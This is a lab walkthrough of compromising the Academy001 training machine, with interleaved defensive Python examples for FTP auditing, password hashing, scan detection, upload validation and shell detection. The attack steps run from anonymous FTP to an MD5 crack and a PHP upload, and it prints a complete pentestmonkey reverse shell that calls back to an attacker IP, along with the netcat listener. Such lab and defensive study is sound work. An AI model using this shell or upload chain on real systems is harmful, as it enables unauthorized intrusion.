Exploiting Academy001 vulnerable Machine

Abdullah Hamza
10 min read · Oct 8, 2023


Check network integration

The first step is to check that the attack machine and the vulnerable machine can reach each other; the ping command is enough for this. Here's how we did it:

Find the IP addresses:

Use the ifconfig command on Kali (the attack machine) to find its IP address.

Kali Linux Terminal

Use the ip addr command on the vulnerable machine to find its IP address.

Academy 001 Machine

Ping from the vulnerable machine to the attack machine:

On the vulnerable machine, use the ping command to check whether it can reach the attack machine. Press Ctrl + C to stop the ping process.

Academy 001 Machine

Ping from the attack machine to the vulnerable machine:

On the attack machine (Kali Linux), open a terminal and use the ping command to check whether it can reach the vulnerable machine. Press Ctrl + C to stop the ping process.

Kali Linux Terminal

Receiving replies in both directions confirms that the attack machine and the vulnerable machine can communicate over the network. If you don't get replies, check the network configuration, firewall rules, and connectivity on the machines or the network.

Scanning vulnerable machine

Now scan the vulnerable machine with nmap using the following command:

nmap -A -sC -sV -O 10.0.2.15
  • -A enables aggressive scanning. It is a shortcut that combines several other options (it already includes -sC, -sV and -O, so the separate flags below are redundant but harmless) to provide more comprehensive information about the target host.
  • -sC flag enables script scanning using NSE scripts. NSE scripts are custom scripts that can be used to automate a wide range of tasks, including vulnerability detection, service enumeration, and more.
  • -sV flag is used for version detection. It attempts to determine the version of the service running on each open port. This can be valuable for identifying potentially vulnerable software.
  • -O flag is used to perform OS detection. It tries to determine the operating system of the target host based on various factors, such as TCP/IP fingerprinting.
  • 10.0.2.15 is the IP address of the vulnerable machine.
Kali Linux Terminal

Anonymous FTP login

Kali Linux Terminal

The scan results show "Anonymous FTP login allowed", which means the FTP (File Transfer Protocol) server on the target is configured to accept anonymous logins. Anonymous FTP lets users connect without a real account: they log in with the username "anonymous" or "ftp" and, by convention, use their email address as the password.

The purpose of anonymous FTP access is to provide a way for users to download publicly available files from a server without the need for authentication. It’s commonly used by software repositories, public file archives, and websites that distribute open-source software or other publicly accessible data.

However, allowing anonymous FTP access can pose security risks if it is not configured properly: if the anonymous user has write permission in sensitive areas, it can lead to unauthorized access or data breaches.

During a security assessment, finding anonymous FTP login allowed is a potential vulnerability, and the FTP server configuration should be examined further to confirm that anonymous users are limited to what they need. Best practice is to restrict the directories anonymous users can reach and to set permissions that prevent unauthorized activity.
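What "examine the configuration further" looks like in practice: the following is an added example for this walkthrough (Python, not code from the lab or from vsftpd) that audits a vsftpd-style configuration for the settings behind the nmap finding. The two configuration texts are constructed; the option names (anonymous_enable, anon_upload_enable, anon_mkdir_write_enable, write_enable, anon_root) are real vsftpd options.

```python
"""Audit a vsftpd-style configuration for the anonymous-access settings behind
the "Anonymous FTP login allowed" finding.

Added example for this walkthrough, not code from the lab or from vsftpd.
The two configuration texts are constructed; the option names are real
vsftpd options (see vsftpd.conf(5)).
"""

# Constructed: the kind of configuration that produces the nmap finding.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
anon_root=/srv/ftp
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
"""

# Constructed: anonymous access switched off; only local accounts may log in.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""


def parse_conf(text):
    """Return {option: VALUE} from key=value lines, skipping blanks and comments."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        opts[key.strip()] = value.strip().upper()
    return opts


def audit_anonymous(text):
    """Return a list of findings; an empty list means anonymous FTP is disabled.

    vsftpd's compiled-in default for anonymous_enable is YES, so an absent
    option is treated as enabled rather than assumed safe.
    """
    opts = parse_conf(text)
    findings = []
    if opts.get("anonymous_enable", "YES") != "YES":
        return findings
    findings.append("anonymous login enabled (anonymous_enable=YES)")
    # The anon_* write options only take effect when the global write switch is on.
    writable = opts.get("write_enable") == "YES"
    if writable and opts.get("anon_upload_enable") == "YES":
        findings.append("anonymous users may upload files (anon_upload_enable=YES)")
    if writable and opts.get("anon_mkdir_write_enable") == "YES":
        findings.append("anonymous users may create directories (anon_mkdir_write_enable=YES)")
    if "anon_root" not in opts:
        findings.append("no anon_root set; anonymous users land in the ftp account's home")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_anonymous(conf) or ["no anonymous-access findings"])
```

Run it as a script to see the weak configuration produce three findings and the hardened one none; the point of treating a missing anonymous_enable as YES is that an audit should fail closed rather than assume the distribution's packaged default.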

Login to FTP server:

To log in to the FTP server, use the ftp command followed by the target IP. The client then prompts for a username and password; use "anonymous" as both.

ftp 10.0.2.15
Kali Linux Terminal

Navigate through ftp:

We have successfully logged in to the FTP server. Now we can use FTP commands to navigate it: ls lists files, cd changes directory, put uploads a file, get downloads one, and so on.

Kali Linux Terminal

We found a note.txt file. Let's download it with the get command.

Kali Linux Terminal

Let's quit and check that we received the file.

Kali Linux Terminal

Let's look at the contents of the file with the cat command.

Kali Linux Terminal

The file gives us a student registration number and a password hash. We can try to crack the hash with hashcat.

HashCat

Hashcat is a powerful open-source password recovery tool used by security professionals, penetration testers, and researchers. It is designed to recover lost or forgotten passwords through various cracking methods and supports a wide range of password hash and encryption algorithms, which makes it useful for security assessments, forensic analysis, and testing password strength.

Password Hash Cracking

Hashcat is primarily used for cracking password hashes. It supports many cryptographic hash functions, including MD5, SHA-1, SHA-256, bcrypt, and more. First we identify the hash from note.txt with hash-identifier:

Kali Linux Terminal

It is possibly an MD5 hash. Let's copy it into a text file and crack it with hashcat.

Kali Linux Terminal

Crack md5 hash:

Use the following command to crack the hash:

sudo hashcat -m 0 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
  • -m 0 sets the hash mode to 0, which corresponds to MD5 hashes.
  • -a 0 selects a dictionary attack, where hashcat tries each word in the wordlist as a candidate password.
  • -o cracked.txt specifies the output file where successfully cracked passwords are saved.
  • hash.txt is the file containing the MD5 hash we want to crack. Hashcat will attempt to find a wordlist entry that hashes to it.
  • /usr/share/wordlists/rockyou.txt is the path to the wordlist used for the dictionary attack. rockyou.txt is a popular and extensive wordlist commonly used for password cracking.
Kali Linux Terminal

Hashcat has successfully cracked the MD5 hash. Now use cat cracked.txt to see the cracked password.

Kali Linux Terminal
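Why a bare MD5 hash falls to a wordlist this quickly, and what the application should have stored instead, as an added example (Python, written for this walkthrough; not the lab's code). guess_hash_type mirrors the length-and-charset reasoning hash-identifier applied above; the sample password and the PBKDF2 round count are constructed values for the demo.

```python
"""Why the MD5 hash from note.txt fell to a dictionary attack in seconds, and
what the application should have stored instead.

Added example for this walkthrough, not code from the lab.  The sample
password and the PBKDF2 work factor are constructed values for the demo.
"""
import hashlib
import hmac
import re
import secrets


def guess_hash_type(digest):
    """Classify a hash string by length and charset, as hash-identifier does.

    A 32-character hex string is *consistent with* MD5 but also with other
    128-bit hex digests (NTLM, for example), so this is a candidate, not proof.
    """
    d = digest.strip()
    if d.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if re.fullmatch(r"[0-9a-fA-F]{32}", d):
        return "MD5"
    if re.fullmatch(r"[0-9a-fA-F]{40}", d):
        return "SHA-1"
    if re.fullmatch(r"[0-9a-fA-F]{64}", d):
        return "SHA-256"
    return "unknown"


def md5_store(password):
    """The weak scheme: fast, unsalted, identical for every user with the same password."""
    return hashlib.md5(password.encode()).hexdigest()


# Constructed work factor so the demo runs quickly; raise it in production
# (OWASP currently recommends several hundred thousand rounds for PBKDF2-HMAC-SHA256).
PBKDF2_ROUNDS = 100_000


def pbkdf2_store(password, salt=None):
    """Salted, slow scheme, stored as 'pbkdf2_sha256$rounds$salt_hex$dk_hex'."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and rounds, then compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_same_digest(scheme, password):
    """True if two users with the same password get identical stored values.

    True for MD5, so one crack (or one precomputed table) covers every user
    with that password; False for the salted scheme.
    """
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    pw = "student123"  # constructed sample password
    print(guess_hash_type(md5_store(pw)), md5_store(pw))
    print("md5 digests identical across users:", same_password_same_digest(md5_store, pw))
    stored = pbkdf2_store(pw)
    print("pbkdf2 digests identical across users:", same_password_same_digest(pbkdf2_store, pw))
    print("verify correct:", pbkdf2_verify(pw, stored), "verify wrong:", pbkdf2_verify("guess", stored))
```

The two properties that let hashcat finish instantly are visible here: MD5 is fast enough to test the whole of rockyou.txt in moments, and with no salt every user who chose the same password shares one digest. A per-user salt and a deliberately slow KDF remove both advantages.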

Check target IP in browser

Web Browser

The target IP serves the default Apache2 page. We can use the FFuF tool to discover potential vulnerabilities or hidden resources.

FFuF

Fuzz Faster U Fool (FFuF) is a popular web application security testing tool used for fuzzing: testing an application by sending it many unexpected or invalid inputs. Its basic usage takes a target URL and a wordlist; the tool iterates through the wordlist, substituting each entry into the request, to discover potential vulnerabilities or hidden resources.

Discovering directories on target:

ffuf -u http://10.0.2.15/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
  • ffuf is the command to run FFuF.
  • -u http://10.0.2.15/FUZZ specifies the target URL for fuzzing. FFuF replaces the FUZZ keyword in the URL with each entry from the wordlist.
  • -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt specifies the wordlist file to use. This wordlist contains directory and path names that FFuF will try on the target URL.
Kali Linux Terminal

The results show two paths that look interesting. Let's try to access them through the browser.

FFuF Results
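The same ffuf run seen from the server side: an added detection example (not part of the original walkthrough) that counts 404 responses per source address in an Apache access log using a sliding window. The log lines are constructed to resemble the scan above; the User-Agent is ffuf's default string, and the threshold and window size are assumptions to tune per site.

```python
"""Spot a directory brute-force like the ffuf run above in an Apache access log.

Added example for this walkthrough; the log lines are constructed, not taken
from the lab.  The User-Agent string is ffuf's default ("Fuzz Faster U Fool").
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed combined-format lines: one scanning source, one ordinary browser.
SAMPLE_LOG = """\
10.0.2.4 - - [08/Oct/2023:10:15:01 +0000] "GET /images HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:01 +0000] "GET /download HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:02 +0000] "GET /2006 HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:02 +0000] "GET /news HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:03 +0000] "GET /academy HTTP/1.1" 301 325 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:03 +0000] "GET /crack HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.4 - - [08/Oct/2023:10:15:04 +0000] "GET /phpmy HTTP/1.1" 404 437 "-" "Fuzz Faster U Fool v2.0.0"
10.0.2.7 - - [08/Oct/2023:10:16:10 +0000] "GET /academy/ HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.2.7 - - [08/Oct/2023:10:17:30 +0000] "GET /favicon.ico HTTP/1.1" 404 437 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_log(text):
    """Yield one dict per well-formed combined-format line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["status"] = int(rec["status"])
        yield rec


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return alerts for sources with more than `threshold` 404s in any window.

    Counts 404 timestamps per source IP with a two-pointer sliding window and
    also records whether the source presented a scanner User-Agent.
    """
    not_found = defaultdict(list)
    agents = defaultdict(set)
    for rec in parse_log(text):
        agents[rec["ip"]].add(rec["ua"])
        if rec["status"] == 404:
            not_found[rec["ip"]].append(rec["ts"])

    alerts = []
    for ip, times in not_found.items():
        times.sort()
        peak, start = 0, 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts.append({
                "ip": ip,
                "not_found_in_window": peak,
                "scanner_ua": any("Fuzz Faster U Fool" in ua for ua in agents[ip]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The User-Agent check is a bonus, not the signal: ffuf's -H flag lets a scan present any User-Agent, whereas the burst of 404s from one address is inherent to wordlist-driven discovery.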

Getting access to busted paths

Open a web browser and go to http://10.0.2.15/academy

Web Browser

Let's try the username and password we got from the note.txt file.

Web Browser

We have successfully logged in using the student registration number and the cracked password. Let's navigate through the pages.

Web Browser

Change records:

Let's try to update the student information. We can try to upload a picture. I got the image from https://thispersondoesnotexist.com/.

Web Browser

The page reports "Student record updated successfully". We already saw during directory busting that the website runs on a PHP server.

FFuF Results

Execute php script:

Upload a sample PHP script instead of an image to check whether the server is configured to execute PHP scripts.

Web Browser

After uploading the PHP script, the image won't show up. Right-click on the image and select "Open image in new tab".

Web Browser

The sample script is executed. Enter a name and submit.

Web Browser

The script runs and works fine.

Web Browser
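The upload form just accepted a PHP file because it trusted the client's filename and content. Below is an added example (Python, written for this walkthrough; not the Academy application's own PHP code) of the checks a hardened picture upload performs: an extension allowlist, a magic-byte check, a scan for script markers inside the file, and a random storage name so nothing the client supplied reaches the filesystem. The policy, the size limit and the marker list are assumptions. Independently of these checks, the upload directory should be served with script execution disabled (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration block), so that a file which slips through is still never interpreted.

```python
"""Hardened handling for the profile-picture upload that the walkthrough abuses
to run PHP.

Added example for this walkthrough, not code from the Academy application.
Assumed policy: only JPEG/PNG/GIF, checked by magic bytes, stored under a
random name; the application never trusts the client's filename.
"""
import os
import secrets

# Allowed extension -> leading bytes the file must start with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Markers that have no business inside a picture; catches polyglot files that
# carry a valid image header followed by server-side code.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    """Raised with a reason the server can log (it need not be shown to the client)."""


def validate_image_upload(client_filename, data, max_bytes=2_000_000):
    """Return a safe storage filename for `data`, or raise UploadRejected."""
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    # Drop any directory components the client sent (../../ and the like).
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in IMAGE_MAGIC:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not match declared image type")
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers inside image")
    # Random name: nothing from the client reaches the filesystem, and a
    # double extension such as name.php.jpg cannot survive the rename.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(client_filename, data):
    """Boolean wrapper around validate_image_upload for quick checks."""
    try:
        validate_image_upload(client_filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)          # constructed minimal PNG header
    print("photo.png ->", validate_image_upload("photo.png", png))
    print("reverse_shell.php accepted?", is_accepted("reverse_shell.php", b"<?php echo 1; ?>"))
```

A magic-byte check alone is not enough (an image with PHP appended still starts with a valid header), which is why the marker scan and the execution-disabled upload directory are both there; defence in depth is the point, not any single check.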

Reverse shell attack

Copy the PHP script given below and save it as reverse_shell.php.

Change the IP and port to the address and port on which you want to start the listener. In my case I chose port 1299.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.2.4';   // CHANGE THIS IP to your kali machine IP
$port = 1299;       // CHANGE THIS port to the port of your choice
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon; // $daemon is set at file scope; without this the function always prints
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Start listener:

Start a listener on the attack machine (Kali Linux) using the command:

nc -lvp 1299
Starting Listener on Kali Terminal

Upload script on target:

Upload the reverse shell script on the target and click update.

Web Browser

Reverse Shell:

As soon as the script is uploaded it executes automatically and we get the reverse shell.

Kali Terminal Reverse Shell

Try executing a few commands to verify the shell:

whoami
ip addr
ping google.com
Reverse Shell

Bravo! We’ve gained access to the system!
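From the defender's side, what just happened leaves a clear host-level trace: a web server process, or a shell it spawned, holding an outbound TCP connection to an arbitrary high port. The following added example (Python, written for this walkthrough; not part of the original post) parses output in the shape of `ss -tnp` and flags exactly that. The sample lines are constructed to resemble the target while the shell is connected; the served-port list and process names are assumptions to adapt per host.

```python
"""Host-side detection for the reverse shell obtained above: a shell or web
server process that owns an outbound TCP connection.

Added example for this walkthrough; the `ss -tnp`-style lines are constructed
to resemble the target while the shell is connected, not real captures from
the lab.  The served-port list and process names are assumptions.
"""
import re

# Constructed output in the shape of `ss -tnp` (state, queues, local, peer, users).
SAMPLE_SS = """\
ESTAB 0 0 10.0.2.15:80 10.0.2.4:51234 users:(("apache2",pid=1501,fd=13))
ESTAB 0 0 10.0.2.15:39214 10.0.2.4:1299 users:(("sh",pid=1532,fd=3),("apache2",pid=1501,fd=12))
ESTAB 0 0 10.0.2.15:22 10.0.2.9:40022 users:(("sshd",pid=912,fd=4))
"""

SERVED_PORTS = {21, 22, 80, 443}                   # ports this host legitimately listens on
WEB_PROCS = {"apache2", "httpd", "php-fpm", "php"}  # processes that should only accept connections
SHELLS = {"sh", "bash", "dash", "zsh"}              # processes that should never own a socket

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


def parse_ss(text):
    """Yield (state, local_port, peer, [(proc, pid), ...]) for each ESTAB line."""
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6 or parts[0] != "ESTAB":
            continue
        local_port = int(parts[3].rsplit(":", 1)[1])
        procs = [(name, int(pid)) for name, pid in PROC_RE.findall(parts[5])]
        yield parts[0], local_port, parts[4], procs


def find_suspicious_sockets(text):
    """Return alerts for established sockets that a web stack should never own.

    Two independent signals: a shell process holds a TCP socket at all, or a
    web server process is connected on a local port it does not serve (which
    means it initiated the connection rather than accepting it).
    """
    alerts = []
    for _state, local_port, peer, procs in parse_ss(text):
        names = {name for name, _ in procs}
        reasons = []
        if names & SHELLS:
            reasons.append("interactive shell holds a TCP socket")
        if local_port not in SERVED_PORTS and names & WEB_PROCS:
            reasons.append("web server process made an outbound connection")
        if reasons:
            alerts.append({"peer": peer, "procs": procs, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_sockets(SAMPLE_SS):
        print(alert)
```

The same signal is what an egress firewall rule turns into prevention: a web server that is not allowed to open connections to arbitrary external ports cannot deliver the callback, however the script reached the disk.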

Congratulations! This walkthrough finishes here.
